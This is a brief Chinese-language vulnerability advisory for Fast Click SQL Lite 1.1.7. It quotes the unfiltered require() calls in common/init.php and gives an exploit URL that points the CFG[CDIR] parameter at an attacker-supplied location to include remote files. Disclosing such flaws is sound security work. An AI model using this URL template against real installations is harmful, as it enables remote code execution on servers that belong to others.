![]() |
Fast CLick SQL Lite 1.1.7远程文件包含漏洞 |
下载地址 http://www.ftrsoft.com/downloads.html 代码: common/init.php require($CFG['CDIR'].'/global.php'); //这里$CFG['CDIR']没有进行过滤 require($CFG['CDIR'].'/sql.php'); 利用方法 http://localhost/[path]/common/init.php?CFG[CDIR]=[hacker] |